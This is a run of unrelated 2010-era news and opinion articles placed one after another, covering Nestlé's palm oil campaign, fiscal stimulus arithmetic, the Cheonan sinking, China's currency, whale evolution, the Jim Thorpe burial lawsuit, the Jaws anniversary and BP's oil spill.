Tom Hicks negotiated with potential buyers , including Houston businessman Jim Crane and former agent Dennis Gilbert , but settled on the Greenberg - Ryan group .
Hicks entered into exclusive negotiations with Greenberg and agreed on a deal in late January .
Since then , the creditors , which must approve the agreement , have not signed off on it .
Nestlé , the world 's biggest food manufacturer , says it will make the palm oil in its best - selling chocolate bars more eco-friendly , after a guerrilla campaign against it on the internet .
The Swiss confectionery - to - coffee giant said it was inviting a not - for - profit group to audit its supply chain and promised to cancel contracts with any firm found to be chopping down rainforests to produce the vegetable oil , which it uses in KitKat , Aero and Quality Street .
The concession followed a three - month campaign by the environmental group Greenpeace , which led to Nestlé being attacked on social networking sites such as Facebook and YouTube .
One million people watched Greenpeace 's spoof advert for KitKat , despite its being taken off YouTube temporarily after a legal threat .
As well as illustrating the vulnerability of multinational companies to new media campaigns by NGOs which can galvanise individuals in a way that was impossible before the creation of the internet , the campaign also illustrated the intense environmental controversy surrounding palm oil .
Thousands of hectares of rainforests in Malaysia and Indonesia have been cleared to make way for oil palm plantations , depriving tribes of ancestral lands , increasing climate change emissions and killing rare animals such as the Sumatran tiger , sun bear , clouded leopard and pangolins .
Campaigners have particularly stressed the damage done to orangutans , a close relative of man which lives only on the heavily deforested islands of Borneo and Sumatra .
Since
The Independent disclosed the presence of palm oil in 43 of the UK 's top - selling grocery brands , companies such as Nestlé , Marks & Spencer , Cadbury and Mars have committed to moving to a sustainable supply .
But Nestlé had been a relatively slow mover , promising only to meet the latest acceptable date of 2015 set by the World Wildlife Fund for moving to supplies certified sustainable by the Roundtable on Sustainable Palm Oil .
On 17 March , Greenpeace began a campaign against Nestlé , launching an early morning protest at its UK headquarters in Croydon , Surrey , and posting its one - minute Have a Break ?
" advert " on the internet .
It showed an office worker biting into a KitKat containing an orangutan finger , which dripped blood onto a computer keyboard .
" Indonesian forests are being torn down to grow palm oil , which is the vegetable fat of choice for companies worldwide , including Nestlé , " Greenpeace complained .
" But while many companies such as Unilever and Kraft are making efforts to disassociate themselves from the worst practices of the palm oil industry , Nestlé has done diddly squat . "
The action group claimed it had uncovered evidence that the Indonesian palm oil supplier Sinar Mas – which it said supplied Nestlé – had been involved in continuing deforestation .
Nestlé denied it bought oil from Sinar Mas but said it would ask its supplier , Cargill , to investigate the claims .
That was not enough to stop the campaign .
Members of the public posted angry messages on Nestlé 's Facebook page – substituting the word Killer for KitKat ; anti-Nestlé campaign groups such as Baby Milk Action and Nestlé Critics took up the cause ; and hundreds of thousands of people watched the grisly Have a Break ?
video .
On 15 April , Greenpeace disrupted Nestlé 's annual general meeting in Lausanne .
Protesting " orangutans " met arriving shareholders and , inside the building , activists hidden in the ceiling unfurled banners with the message : " Nestlé , give the orangutans a break " .
Apparently braced for the protests , the company 's chairman , Peter Brabeck , defended the company 's position , saying Nestlé only used 320,000 tonnes of palm oil a year , slightly under one per cent of global production and less than the 500,000 tonnes used for bio-fuel in the UK and Germany .
To applause , rather than blaming Nestlé for deforestation in Indonesia , he blamed a " political decision " to use palm oil as a bio - fuel .
The protests continued .
On Monday , Nestlé announced what Greenpeace hailed as a " positive step " – the auditing of its supply chain by the Geneva - based Forest Trust .
The company said : " By setting critical requirements for its procurement process and checking compliance with our supplier code , Nestlé wants to ensure that its products have no deforestation footprint . "
The company intended to source 18 per cent of its palm oil from " sustainable sources " this year and 50 per cent by the end of 2011 .
Scott Poyntor , the Forest Trusts 's executive director , said the commitment was a " game changer " .
" For the first time , a global company is saying it does n't want its products to have a deforestation footprint , and is taking action to live up to its words , " he said .
Greenpeace welcomed the agreement , which it warned it would closely monitor .
" Online and offline the message to Nestlé has been strong and relentless over the past two months , " it told its supporters .
" All of it – from protesting orangutans on the streets to Facebook status updates – has brought us to today 's commitment . "
Who 's going green – and when
The dates by which firms say they will have all their palm oil supply certified sustainable by the Roundtable on Sustainable Palm Oil .
2011 United Biscuits
2012 Unilever , Waitrose
2014 Sainsbury's , Cadbury
2015 Marks & Spencer , Mars , Co-op , Tesco , Asda , Nestlé , Procter & Gamble , Allied Bakeries
During World War I in particular , cycle - mounted infantry , scouts , messengers and ambulance carriers were used extensively by all combatants
Italian Bersaglieri during WWI with bicycles strapped to their backs c.1917
“ Bersaglieri were high mobility unit who fought French and Austro - Hungarian troops along the trenches and ridge lines of the Alps .
They were known for their high morale and aggressive spirit .
During that war , 50,000 lost their lives ”
German bicycle infantry on the northern Russian front in 1941
“ German light infantry battalions each had a bicycle company at the outbreak of the war , and additional companies were raised during the war bringing the total to 80 companies , a number of which were formed into eight bicycle battalions ”
Danish soldiers cycling to the front during the Battle of Denmark , 1940
Bicycle Corps at Fort Missoula in 1897
Even today in a modern warfare situation bicycles have been employed , such as with the US government ’s use of bikes in Afghanistan and Iraq
there ’s something definitely eerie about the use of something that most of us use for recreational purposes ( along with commuting ) in a military context .
It makes sense to use them , as they are compact , quiet and efficient , though it still makes for very unusual photographs
To read Charles Krauthammer today is to enter a twilight zone of an alternate reality .
A country permanently occupying and colonizing a neighboring region , and treating its original inhabitants as dangerous interlopers , is the victim .
An elite commando unit attacking a ship carrying toys and wheelchairs in the hours before dawn are those we should feel pity for .
A country with 150 nuclear warheads and the strongest military in its region , the victor in every conventional war it has always fought , is somehow also always fighting for its very existence .
A country backed by the sole superpower , supplied with aid by huge majorities in the US Congress , is facing extinction .
Self - defense requires not civilly disabling and inspecting the cargo of an unarmed ship but raiding it at dawn and killing nine and injuring dozens .
Basic human revulsion at a military that can kill over a thousand people - including scores of women and children in a trapped , impoverished enclave - can only be a function of anti-Semitism .
A territory that is being systematically populated with Israelis in illegal settlements in contravention of the Geneva Conventions is merely a " buffer zone " .
You need to colonize buffer zones ?
Invasion and occupation of neighboring countries is " forward defense " .
And asking that a two - state solution be moved forward by freezing illegal settlement construction and allowing a blockade that , while interdicting arms , does n't seek to kill civilians and restrict the import of basic necessities is to deprive a country with 150 nuclear warheads of any legitimate form of self - defense .
We Are Live at The Week : As the disappointing May job numbers confirm , this is still an exceptional time — a time in which many of the normal rules of the Dismal Science are changed and transformed .
It is a time for not normal economics but rather “ depression economics . ”
The terms on which the U.S. government can borrow now are exceptionally advantageous .
And because of high unemployment the benefits of boosting government purchases and cutting taxes right now are exceptionally large .
The result is that the costs of borrow - and - spend policies are overturned for the short run—indeed , for as long as the current economic crisis of high unemployment lasts , which may well mean that the short run is not very short .
In normal times , a boost to government purchases or a cut in taxes produces a limited increase in production and employment while adding a substantial increase to the national debt .
The increase in debt raises interest rates , which crowds out productivity - increasing private investment spending and , dollar for dollar , leaves us poorer after the effect of the stimulus ebbs .
The borrowing must then must be financed at a significant interest rate , and thus paid for with higher taxes , which reduce incomes by increasing the wedge between the private rewards and the social benefits of expanded production .
It 's nasty business .
Normally , only government spending initiatives or tax cuts that promise a high value for the dollar are worth undertaking , but things are different now .
However , right now , as best we can tell , an increase in federal spending or a cut in taxes will produce ( in the short run ) no increase in interest rates and hence no crowding - out of productivity - increasing private investment .
Indeed , government spending that adds to firms ’ current cash flow may well boost private investment and so leave us , dollar for dollar , richer after the effect of the stimulus ebbs .
Why ?
Because our debt today can be financed at extremely low interest rates — 1.83 percent if financed via 30 - year TIPS , and even less in expected real interest if financed over a shorter horizon .
In normal times , only government spending initiatives or tax cuts that promise a high value for the dollar are worth undertaking .
Now , however , things are very different .
Let ’s run through the arithmetic .
Normal Economic Arithmetic :
Consider a $ 100 billion boost to government purchases or cut in taxes financed by borrowing from abroad .
In a normal year , the Federal Reserve will worry about inflation , and raise interest rates somewhat to offset the inflationary impact of the fiscal boost .
The multiplier will thus be something like 0.4 — we will spend $ 100 billion on government purchases or tax cuts and gain perhaps $ 40 billion in extra production and associated employment out of it .
But there are costs .
First , the added national debt .
The national debt will not rise by the full $ 100 billion :
Those who earn that extra $ 40 billion will pay taxes — perhaps $ 16 billion .
Thus the net impact on the government debt will be that by spending an extra $ 100 billion we will have added some $ 84 billion to the national debt .
That debt must then be amortized .
At a 4 percent per year long - run real rate of interest on government bonds , amortizing that debt will cost Americans $ 3.4 billion a year .
Second , the higher tax rates needed to raise the extra $ 3.4 billion will also exert a cooling supply - side effect on economic activity .
With higher tax rates , people will have greater incentive to spend time and energy dodging their taxes rather than doing useful work .
If this effect amounts to roughly one - third of the revenue raised , then we have to add to the total cost an additional $ 1.1 billion shortfall from the time and energy that would have been used to produce stuff but that will instead be devoted to dodging taxes .
Third , there is another effect .
The Federal Reserve ’s fight against inflation , which demands an increase in interest rates , will have reduced investment .
Due to the $ 100 billion in government purchases , perhaps $ 40 billion of private investment that would have been made wo n’t be made — it will be crowded out .
As a result of the lower capital stock , some $ 4 billion a year of income that would have been earned wo n’t be .
Thus the net cost of the $ 100 billion in government spending will be a reduction in Americans ’ disposable incomes of $ 7.4 billion per year .
That ’s an unattractive bargain .
It would allow us to purchase $ 40 billion of extra production and income this year at the cost of a reduction in incomes of $ 11.9 billion — call it $ 12 billion — in every year in the future .
That is a usurious annual real interest rate of 30 percent .
No sane economist would recommend a policy with such high costs and meager benefits .
Expansionary deficit - boosting fiscal policy is , or ought to be , simply a non-starter in normal times .
Depression Economic Arithmetic :
But right now that arithmetic does n’t apply .
We have instead depression economic arithmetic .
And in depression economic arithmetic things are very different .
First , more government spending does not lead the Federal Reserve to raise interest rates to fight inflation .
The Federal Reserve has pushed interest rates to the floor and wishes it could drive them into the basement — to – 5 percent per year or so .
Thus the multiplier on the government ’s spending is not 0.4 but more like 1.5 .
We do not get $ 40 billion of additional production and employment for $ 100 billion ; we get something closer to $ 150 billion .
And there is no crowding out of private investment ; on the contrary , there is likely to be crowding in .
If one - third of the extra production flows through to corporate profits , and if one - quarter of those extra corporate profits are then invested in projects paying a pretax net real rate of return of 8 percent per year , then future productivity is boosted to the tune of $ 1 billion a year .
Second , that boost to production creates a substantial reflow in taxes that makes the spending program a bargain .
We get $ 150 billion of added production leading to $ 60 billion of additional tax revenue , leading to only $ 40 billion in increased debt .
Third , the financial crisis has created a configuration of interest rates that means that the government can borrow at uniquely favorable terms .
Suppose we borrow at 1.83 percent – we ’ll round it to 2 percent — per year in real terms for the next 30 years .
On those terms , amortizing the $ 40 billion of additional government debt requires only $ 0.8 billion a year in additional interest payments and taxes .
Even adding in our one - third excess burden brings us only to $ 1.07 billion a year in amortization costs .
Now , net all this out .
The increased cash flows to businesses boost future private - sector incomes by $ 1 billion a year .
The costs of amortization reduce them by $ 1.07 billion a year .
The net cost ?
$ 70 million per year .
So to gain $ 150 billion of increased production and incomes this year we incur a $ 70 million a year cost going forward .
That means that using expansionary fiscal policy to boost output today is an investment worth doing at any interest rate greater than 0.05 percent per year .
That is not quite a free lunch — they take away my union card as an economist if I start claiming that free lunches exist .
But it is certainly a value meal .
We are getting more income and employment now — when we really need it — in return for sacrificing only a tiny bit of production each year in the future , when we believe that we will be richer and will mind the reduction significantly less .
The Limits of Depression Economics :
Thus it is a no - brainer that we ought to be doing more fiscal stimulus .
Each dollar of missing production and each unemployed worker right now is much , much more painful to the country and a much greater loss to human welfare than a dollar of missed production and an unemployed worker in normal times .
The argument for more spending is airtight as long as the arithmetic holds out .
That is , until :
further increases in the deficit lead to rising expectations of inflation , leading the Federal Reserve to raise short - term interest rates , which then crowds out private - sector investment spending ;
or :
further increases in the deficit lead to pressure on the federal government ’s debt capacity , so that we can no longer finance additional federal government debt at such extraordinarily advantageous interest rates .
Back in December 2008 the incoming Obama National Economic Council feared that an increase in the proposed size of the Obama stimulus program , the ARRA , from $ 800 billion to $ 1.2 trillion would bring these factors into play .
It is now clear that they were overly pessimistic , in large part because they were overly optimistic about the state of the economy .
Right now , bad politics is undermining good policy , hurting the American economy and legions of unemployed workers .
It is long past time for another stimulus package .
Image caption North Korea warned of consequences if the council discussed the Cheonan
North Korea has sent a letter to the UN Security Council rejecting claims it sank a South Korean warship and warning the council not to debate the issue .
The letter also urged the council to facilitate Pyongyang 's own investigation into the incident .
It comes as Seoul said it had finished installing loud speakers on its borders to broadcast propaganda to the North .
The Cheonan sank on 26 March , killing 46 sailors .
International investigators say a North Korean torpedo sank it .
Seoul last week formally referred the issue to the Security Council .
Probe demands
The letter was reportedly sent by North Korea 's UN envoy Sin Son-ho to UN Security Council President Claude Heller and was released by North Korean state media .
It said North Korea had " nothing to do with the incident " , describing it as a " fabricated scenario " masterminded by the US .
Image caption North Korea does not produce enough food to feed its own people
The key to resolving the dispute was allowing Pyongyang 's investigators to verify the international panel 's findings in a " scientific and objective " manner , it said .
The letter warned of consequences if the issue was put on the council 's agenda for debate without North Korea having been allowed to conduct its own investigation .
This would make it " more than clear that the sovereignty and security of the DPRK [ North Korea ] is infringed upon , and by then no - one would dare imagine how serious its consequences would be with regard to the peace and security on the Korean Peninsula , " it said .
South Korea has rejected the North 's request to send its own investigators .
It is not yet clear whether South Korea is seeking additional sanctions against its communist neighbour or some form of weaker statement .
UN sanctions are already in place against North Korea in the wake of its two nuclear tests in 2006 and 2009 .
Baby food
The warship row has left inter-Korean relations highly tense .
Seoul has suspended inter-Korean trade and Pyongyang responded by cutting all ties .
On Wednesday , South Korea 's army said it had finished installing a series of loudspeakers at 11 points along its border , to broadcast propaganda messages into the North , the Yonhap news agency reports .
Image caption North Korea has threatened to shoot at the speakers if they are used
The speakers were dismantled six years ago as relations improved but Seoul said it would restore them after tensions rose in the wake of the Cheonan report .
Seoul gave no date when the speakers will be turned on - Pyongyang has said it will fire on them when they are .
However , also on Wednesday Seoul approved two shipments of baby food to be sent to the North .
North Korea suffers from severe food shortages and relies on foreign help to feed its people .
Unification Ministry spokeswoman Lee Jong - joo said the aid , with a total value of $ 320,000 ( £ 221,000 ) , would be sent to day - care centres in the North East and near Pyongyang .
" While South Korea will , in principle , hold off on inter-Korean business projects , we will continue providing purely humanitarian aid for the weak like infants and children , " she said .
The stock market is euphoric over China ’s apparent decision to allow its currency to rise against the dollar .
Watch your wallets .
China is n’t really changing anything .
It ’s only doing the minimum to prevent Congress from listing China as a currency manipulator , leading to a squeeze on Chinese imports .
Over time – and I ’m talking about months if not years – China will raise its currency to where it was before the global meltdown in 2008 .
Big deal .
Even then , a stronger yuan wo n’t generate lots of new jobs in the United States
That ’s because most of the gains of China ’s meteoric growth are still not finding their way into the hands of Chinese consumers , whose spending is growing far more slowly than China ’s overall economy .
In 2009 , total personal consumption in China amounted to only 35 percent of the economy ; ten years ago it was almost 50 percent .
Why are Chinese consumers so reluctant to spend ?
First , social safety nets are still inadequate there , so Chinese families have to cover the costs of health care , education , and retirement .
( China recently doubled its spending on these services but the total is still low by international standards – around 6 percent of the Chinese economy , compared with an average of around 25 percent in most developed nations . )
Second , young Chinese men outnumber young Chinese women by a wide margin , so households with sons have to save and accumulate enough assets to compete successfully in the marriage market .
Third , Chinese society is aging quickly because the government has kept a tight lid on population growth for three decades .
That means households are supporting lots of elderly dependents and must save in anticipation of supporting even more .
But most fundamentally , China is oriented to production , not consumption .
It wants to become the world ’s preeminent producer nation .
While keeping the yuan artificially low is costly to China — it pushes up the prices of everything China imports —
China is willing to bear these costs because its currency policy is really an industrial policy .
We think the basic purpose of an economy is to consume , not to produce .
So we only grudgingly support industrail policy .
We think of government efforts to rebuild our infrastructure as a “ stimulus . ”
We approve of government investments in basic research and development mainly to make America more secure through advanced military technologies .
And we give American companies tax credits for R&D wherever they do it around the world .
Do n’t be fooled into thinking that US companies will continue to make big profits from sales in China .
China allows big U.S. and foreign companies to sell in China on condition that production takes place in China – often in joint ventures with Chinese companies .
It was n’t American know - how , so it can eventually replace the US firms with China firms .
GM ’s China sales are soaring but it ’s making those cars there .
It ’s even designing and developing a new subcompact for China , in China .
Proctor & Gamble is so well - established in China that many Chinese think its products ( such as green - tea - flavored Crest toothpaste ) are local brands .
They might as well be .
P&G makes most of them there .
Other American are helping China build a “ smart ” infrastructure , tackle pollution with clean technologies , develop a new generation of photovoltaics that convert solar radiation into electricity and wind turbines , find new applications for “ nanotechologies , ” and build commercial jets and jet engines .
GE was producing wind turbine components in China .
Even if some of this enhances the profits of American - based companies , it does n’t translate into more jobs in the United States .
And it does n’t build know - how here .
It builds it there .
China ’s currency policy also doubles as a social policy designed to maintain order .
Each year , tens of millions of poor Chinese pour into China ’s large cities from the countryside in pursuit of better - paying work .
If they do n’t find it , China risks riots and other upheaval .
Massive disorder is one of the greatest risks facing China ’s governing elite .
That elite would much rather create export jobs , even at the high cost of subsidizing foreign buyers , than allow the yuan to rise much against the dollar and thereby risk job shortages at home .
Here ’s the awkward truth that ’s not openly discussed on either side of the Pacific : Both the United States and China are capable of producing far more than their own consumers are capable of buying .
In the United States , the root of the problem is a growing share of total income going to the richest Americans .
Inequality is also widening in China , but the root of the problem there is a declining share of fruits of economy growth going to average Chinese and increasing share going to capital investment .
Both our societies are threatened by the disconnect between production and consumption .
In China , the threat is civil unrest .
In the United States , it is a prolonged jobs and earnings recession which , when combined with widening inequality , could create a political backlash .
Robert Reich
This article first appeared on Robert Reich ’s Blog .
Republished with permission
Seattle Seahawks Rookie Caught Stealing Top Pot Doughnuts
Usually my embarrassing habit of reading TMZ every afternoon turns out to be nothing but a waste of time ...
UNTIL TODAY !
Because today TMZ reported that Golden Tate , a Seattle Seahawk rookie , was caughtSaturday morning , all because the dude just really wanted a maple bar .
The shop was closed up for the night , but apparently Tate , who lives in the same building , did n't let that stop him and his buddy from getting their sugar fix .
After being caught ,
Tate got a warning from police and promised not to do it again .
At today 's practice the Seahawk player addressed the media about the incident and apologized for his actions , blaming the tasty maple bars for his bad decision .
" When I got [ to Seattle ] it was one of the first things I had .
They 're irresistible , " he said .
Adding , " If you ever want some maple bars , that 's the place to go . "
I wholeheartedly agree .
As long as you go when IT'S OPEN .
By Josh Tyler | 10 years ago
Not long ago Universal Studios gave up on their iconic King Kong ride .
You know the one , where they had a giant , almost lifesize robot King Kong smashing up a city while elated vacationers rode past him on a train .
It was such an iconic ride that it , itself , actually ended up in a few movies .
But it was ravaged by fire and so Universal , rather than rebuilding , took it down , promising to replace it with a new King Kong ride which would be even bigger , better , and more immersive .
Well now it ’s ready , and this may be the most depressing thing I ’ve ever seen .
It ’s called “ King Kong 360 3 - D ” and they hired Peter Jackson to make it a reality .
On paper that seems like a good idea .
On Lord of the Rings Peter Jackson proved to everyone that the best way to build convincing special effects was through a melding of traditional , practical effects with modern CGI .
You ’d think he’d have brought that aesthetic to the ride , but instead what he ’s done is tear everything down , force everyone to wear 3D glasses , and send them through a tunnel of lame screens .
In the first video embedded below you ’ll see Peter taking a tour through the new ride , which is no longer cool at all and amounts to a bunch of people paying amusement park prices to watch a movie .
Then you ’ll see him talk about it , claiming that the 3D makes the whole thing more immersive than ever .
Hey Peter , you know what would really be immersive ?
If someone actually built a fucking lifesize King Kong monkey and we let people see that instead .
Nah that ’s too crazy , nobody could ever build something like that .
Instead let ’s do this boring shit :
How do you know it ’s boring ?
Even the people riding it seem kind of bored .
Probably because they ’ve , you know , seen 3D movies before .
Only you do n’t pay $ 50 dollars to gain entry to M. Night Shyamalan ’s The Last Airbender .
Watch park goers attempt to seem like they ’re enjoying themselves :
Now compare what those bored looking faces are watching to this , the original ride :
King Kong 360 3 - D is now open at Universal Studios .
Unfortunately the original King Kong ride now resides somewhere in a landfill .
Hooray for 3D !
Whales evolved explosively fast into a spectacular array of shapes and sizes , a new study suggests .
Whales ' sizes stretch the imagination from the 100 - foot ( 30 - meter ) long blue whale — the largest animal to have ever existed — to a small species about the size of a dog .
Many ideas exist for how whales evolved into different body types , but the new study , published online in the May 19 edition of the journal Proceedings of the Royal Society B , is the first attempt to unravel the mystery .
" It 's as if whales split things up at the beginning and went their separate ways .
The distribution of whale body size and diet still correspond to these early splits , " said evolutionary biologist and study co-author Michael Alfaro of UCLA .
" Our study is the first to test the idea that evolution in early whales was explosively fast . "
Around 35 million years ago , when modern whales began to appear in the ocean , whale evolution ignited .
Whales began as basically similar body types and evolved into everything from porpoises to blue whales over the next 5 million years , said study lead author Graham Slater of UCLA .
" Five million years is like the blink of an eye , " Slater told LiveScience .
The finding supports what 's known as the explosive radiation hypothesis .
The idea is that a few key traits allowed the earliest ancestors of modern cetaceans — marine mammals , including whales , dolphins and porpoises — to explore new ways of living .
Once these ancestors branched out into a new body form , they stayed the course .
The key traits credited with the explosive evolution include sonar , large brains , baleen ( the stringy looking stuff across some whales ' mouths that filters small animals from sea water ) , and complex sociality .
Looking back 35 million years , to when the ancestor of all living whales appeared , Alfaro and colleagues analyzed the evolutionary tempo of modern whale species and probed how fast whales changed their shape and body size .
The research team analyzed DNA sequences and studied the fossil record to figure out when major groups of whales appeared and when they became dominant .
The " variation that we see in modern whales today is the result of partitioning of body sizes early on in their history , " Alfaro said .
" Whatever conditions allowed modern whales to persist allowed them to evolve into unique , disparate modes of life , and those niches largely have been maintained throughout most of their history . "
Historically , not all of these remarkably diverse body plans were successful .
Today , 84 living species of whales roam the oceans , while more than 400 other species are known to have gone extinct , including some that lived partly on land .
Archaic whales appeared around 55 million years ago , eventually entering the ocean and filling a void left by ancient ocean - dwelling reptiles that went extinct .
These primitive whales , now extinct , ranged in size from a few feet in length to as large as 65 feet ( 20 m ) long .
Large whales , small whales and medium - size whales all appeared early in the history of whales , with the large whales eating mostly plankton , small whales eating fish , and medium - size whales eating squid .
" Those differences were probably in place by 25 million years ago , at the latest , and for many millions of years , they have not changed very much , " Slater said .
A son of sports great Jim Thorpe sued the Pennsylvania town that bears his father ’s name Thursday , demanding that it return his remains to Oklahoma under a federal law designed to give Native American artifacts back to their tribal homelands .
Jack Thorpe , 72 , of Shawnee , Okla. , sued in federal court in Scranton , saying he had waited until the last of his half - sisters died to avoid a family conflict over the lawsuit .
His father , a native Oklahoman born into the tribe , overcame humble roots to win the decathlon and pentathlon in the 1912 Olympics .
Jim
Thorpe later earned enviable sums playing professional football and baseball , and somewhat less playing the Indian in B - list Hollywood movies , then struggled financially before his March 1953 death in California at age 64 .
In a bizarre deal to draw tourists , the merging towns of Mauch Chunk and East Mauch Chunk , Pa. , brokered a deal with Thorpe ’s ambitious third wife that renamed the community
in 1954 and brought his remains to a corner of the Pocono Mountains that he likely never saw .
Thorpe ’s three daughters long endorsed the arrangement , especially daughter Grace , a Native American activist who sometimes visited for the town ’s annual Jim Thorpe celebration .
But Jack and his three brothers opposed it , believing their father belongs in sacred tribal burial land in Shawnee .
Tucked in a steep valley on the western edge of the Poconos , the town of Jim Thorpe has been a popular tourist draw for decades , offering historic architecture , quaint shops , train excursions and outdoor recreation from whitewater rafting to guided fall foliage tours .
Defendant John McGuire , the council ’s vice president , favors keeping Thorpe ’s remains at the roadside memorial overlooking the Lehigh River .
He believes a majority of the town ’s residents do , too .
Even if the lawsuit is successful , McGuire considers it unlikely that the town would change its name again .
Thorpe became well - known during the 1912 Olympics in Sweden , when his track titles led King Gustav V to declare ,
" Sir , you are the greatest athlete in the world . "
The 24 - year - old Thorpe replied :
" Thanks , King . "
The medals were rescinded a year later over concerns Thorpe had played some semi-professional baseball .
But the family had them restored posthumously in 1982 .
Jack
Thorpe hopes town leaders will now put the debate over his body to rest without a trial .
' Jaws ' Launched Summer Blockbuster 35 Years Ago Where the cast of " Jaws " is on the movie 's 35th anniversary .
June 18 , 2010  --
It was the summer of ' 75 , and beach attendance fell as folks flocked to theaters to catch the phenomenon known as " Jaws . "
The movie , released in theaters 35 years ago this Sunday , not only instilled a fear of killer great white sharks , leading to a marked drop in beach attendance , but launched the beginning of the summer blockbuster .
" It had a good scary premise lots of people could relate to , " Gregg Kilday , film editor at The Hollywood Reporter , told ABCNews.com .
Never before had a movie done so well in the previously dead summer months .
Following the widest distribution of its time and a national television advertising campaign , " Jaws " became the first film to top $ 100 million at the domestic box office .
On the heels of the success of " Jaws , " the Hollywood studios began shifting their action and thriller movies to a wide summer release , creating what has become known as the summer movie season .
" Jaws " was a critical success , too .
The New Yorker 's Pauline Kael called it " the most cheerfully perverse scare movie ever made . "
Filmgoers developed a fear of sharks in much the same way they feared showers after the release of " Psycho . "
The story , based on Peter Benchley 's best - selling novel , centers on the small fictional Amity Island , where a shark attack prompts new police chief Martin Brody ( Roy Scheider ) to close the beaches .
When Brody is overruled by the mayor , the shark continues to strike , nearly killing Brody 's son .
Brody , fish specialist Matt Hooper ( Richard Dreyfuss ) and professional shark hunter Quint ( Robert Shaw ) head out to sea to hunt the great white .
Brody succeeds in killing it but not before it takes Quint 's life .
When the movie was released , the nation was gripped by " Jaws " fever and Universal capitalized on it by selling the film 's soundtrack , along with stuffed sharks , beach towels , T - shirts , caps and action figures .
Who can forget the movie 's theme song ?
" Da -dum , da - dum , da - dum " became synonymous with impending danger .
The simple alternating pattern of the E and F notes earned composer John Williams an Academy Award .
' Jaws ' Remake in the Works ?
Though three sequels would follow , their combined grosses would barely match the take of the original film .
Today , the original still stands the test of time .
" Keep in mind that movie was made without digital effects , " Kilday said .
" It was a combination of physical effects , with a fake shark that did n't work all that well , filmmaking craft and tricks , the editing , the music score and the actors and their reactions .
Some of that been lost today as filmmakers rely more on digital effects . "
In recent years there 's been talk of a remake -- the latest rumors include Tom Cruise taking over the role of Brody and comedian Tracy Morgan filling Quint 's role in a 3 - D version .
In February , Morgan told MTV he would " love to do a ' Jaws ' movie " but had not yet been approached about it .
A spokesman for Universal told ABCNews.com the rumors are untrue .
" There is no remake in development , " he said .
Should the studio execs decide otherwise , they wo n't have to look far for their shark .
One of the 25 - foot mechanical beasts was located in a Los Angeles junkyard by an NPR reporter .
It had once been displayed at the Univeral Studios theme park .
No doubt anyone seeking to remake the film will want to seek the blessing of its original director , Steven Spielberg , who went on to become one of the most successful directors of all time .
Here 's a look at what 's happened to Spielberg and the film 's stars since the release of " Jaws . "
Martin Brody / Roy Scheider
Scheider appeared in two popular films of the early ' 70s , " Klute " and " The French Connection , " and earned an Oscar nod for best supporting actor before landing the role as police chief Brody .
Scheider uttered one of the film 's more famous lines , " You 're gonna need a bigger boat , " which he actually ad - libbed during the scene when Brody first comes face to face with the shark .
The line was voted 35th on the American Film Institute 's list of best movie quotes .
Cast of ' Jaws ' : Where Are They Now ?
After " Jaws , " Scheider dropped out of " The Deer Hunter " in which he'd been offered the role of Michael , which Robert De Niro later filled .
Still obligated to Universal , Scheider reprised his role as Brody in " Jaws 2 . "
The sequel did well at the box office but in no way compared to the original .
Scheider also reportedly clashed with director Jeannot Szwarc .
In 1979 , Scheider received his second Academy nomination , this time for best actor for his role as Bob Fosse in " All That Jazz . "
He continued to work through the ' 80s , '90s and 2000s , but never earned the same critical success as he did in his early years .
In 2004 , Scheider was diagnosed with multiple myeloma .
He died four years later at the age of 75 in a hospital in Little Rock , Ark .
Matt Hooper / Richard Dreyfuss
Dreyfuss reportedly turned down the role of Hooper when it was first offered , but then , worried that " The Apprenticeship of Duddy Kravitz , " in which he had his first starring role , would flop , he called back Spielberg and immediately accepted .
It was a fortuitous decision .
Following " Jaws , " Dreyfuss partnered with Spielberg again in " Close Encounters of the Third Kind . "
In 1978 , he became the youngest actor to win the Academy Award for best actor for his portrayal of a struggling actor in " The Goodbye Girl . "
But Dreyfuss did not handle success well .
He became addicted to cocaine and in 1982 was arrested for possession after his car struck a tree .
The actor entered rehab and in 1986 made his film comeback with " Down And Out In Beverly Hills . "
Since then , Dreyfuss , now 62 , has starred in comedies ( " What About Bob ? " ) , dramas ( " Mr. Holland 's Opus , " for which he received another Oscar nod ) and Apple computer commercials .
Quint / Robert Shaw
English actor Robert Shaw had a notable career before starring as Quint in " Jaws . "
He played a secret agent in the second James Bond film , a mobster in " The Sting " and the hijacker Mr. Blue in " The Taking of Pelham One Two Three . "
But it 's as shark hunter Quint that he may be best known .
The film 's producers reportedly suggested Shaw after working with him on " The Sting . "
Who can forget the scene where the boat begins to sink and Quint slides down the slippery deck into the shark 's waiting mouth .
Shaw starred in several other films , including " The Deep , " also based on a Benchley novel , and " Black Sunday , " before his death in 1978 .
He suffered a fatal heart attack at the age of 51 while filming his last movie " Avalanche Express . "
Director Steven Spielberg
" Jaws , " only the second feature Spielberg directed , made the director a household name , but he has often lamented how it became his own personal test .
The production was nicknamed " Flaws " because of all the shooting delays and budget over - runs , often due to the three mechanical sharks ' frequent malfunctionings .
Originally budgeted for $ 4 million , the final production cost $ 9 million and filming lasted 159 days instead of the scheduled 55 days .
" I thought my career as a filmmaker was over , " Spielberg later said in a newspaper interview .
Instead , the box office success of " Jaws " launched Spielberg as one of the country 's most successful directors .
" Jaws " along with " E.T. the Extra - Terrestrial " and " Jurassic Park " shattered box - office records and " Schindler 's List " and " Saving Private Ryan " earned him Academy Awards for best director
Now 63 , with an estimated worth of $ 3 billion and his own Dreamworks Studio , Spielberg can write his own ticket .
Former EPA investigator charges , “ What the government has done over the past several years is taught BP that it can do whatever it wants and will not be held accountable ”
As the current Gulf oil spill crisis intensifies , previous incidents involving BP have begun coming under renewed scrutiny , intensifying suspicions that the company may be concealing the true extent of the spill .
ADVERTISEMENT
Citizens for Responsibility and Ethics in Washington ( CREW ) and Greenpeace have now filed four Freedom of Information Act requests seeking documents and video feeds .
“ It is impossible to understand why the government has nÃ¢â‚¬â „ ¢t already made the video feed and other records documenting the impact of the spill public , ” explained CREW executive director Melanie Sloan .
“ Americans have the right to any information that would allow an accurate assessment of the true dangers this oil spill has created . ”
The requests were sent out late on Wednesday to the Coast Guard , the Environmental Protection Agency , the Department of the Interior , and the National Oceanic and Atmospheric Administration .
One of the strongest critics of BP is former EPA investigator Scott West , whose explosive charges concerning his investigation of a major BP oil spill on Alaska ’s North Slope in 2006 were revealed in interviews with Jason Leopold at TruthOut and then with Amy Goodman at Democracy Now !
“ In August of 2005 , I was introduced to Chuck Hamel , who spoke to me about employees and workers on the North Slope providing information that the transit lines were full of sludge and were likely to suffer catastrophic failure , ” West explained to Goodman .
